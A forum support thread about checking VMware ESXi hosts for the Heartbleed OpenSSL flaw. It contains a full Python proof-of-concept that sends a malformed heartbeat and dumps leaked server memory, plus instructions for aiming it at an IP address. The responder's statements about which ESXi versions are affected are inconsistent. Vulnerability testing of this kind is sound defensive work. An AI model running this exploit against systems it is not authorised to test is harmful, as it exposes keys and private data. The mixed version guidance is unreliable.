A Script to Determine OpenSSL version on ESXi Host

see this thread, will answer your question, you just need to check VMware ESXi BUILDs

a test script is included...

https://communities.vmware.com/thread/475569

prior to ESXi 5.5 should be unaffected.

VMware response...

http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2076225

Hancock,

Sorry for the delayed response.  I have been involved in other support activities over the weekend.  I followed the thread as you recommended.  I reviewed the script and I have a series of questions:

1.  Is this a PowerCli?
2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.
3. Would the script be saved as a text file and launched from within PowerShell from the command line?

That you for your support.

lipotech

1.  Is this a PowerCli?

No.

It's not PowerCLI.

Are all your hosts 5.5, if they are 5.5, they have the issue.

If they are lower than 5.1, they do not have this issue.

It's that simple, the details in the forum, are a simple openssl.exe connection call.

2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.

It's run from the command prompt, in the Openssl folder, against the IP Address, of a suspect system (vCenter Server or Host)

3. Would the script be saved as a text file and launched from within PowerShell from the command line?

It's not a script, it's just a command line function.

Personally, I would not waste your time, check your Host versions > 5.1 you have the threat, and you will need to wait for the VMware patch.

< 5.1 no threat exists!

if you really want a script, here is a python script

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ' %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()

  

Select allOpen in new window

Hancock,

Thank you.  I or two more final questions.  Is the Pytjon script luanched fromt the ESX host OpenSSl folders as well?  Can I launch the script as is by saving it to a text file?  What extention would I use on the file?  Do I point this file at the IP address as well?

lipotech

You will need to use the Python script on any computer which has Python installed, this is NOT ESXi!

OpenSSL is not required, just Python.

Save the above to a file called <filename.py> execute permissions, and run from Linux or Windows.

you type

./heartbleed.py <IP Address?

it will return:-

WARNING: server returned more data than it should - server is vulnerable!

Hancock,

I can install Python and use this script.  I would prefer to run a PowerCLI script in this environment.  If there is PowerCLI script that exist, please let me know.  

Otherwise, thank you for providing a complete response to my question.

lipotech

Thank you.

no problems

If you know of any PowerCli scripts of any type that would be easy follow and test, it would be appreciated.  I am in the process of trying to become more proficient with the PowerCLI scripting language.

See my response to your recent posting.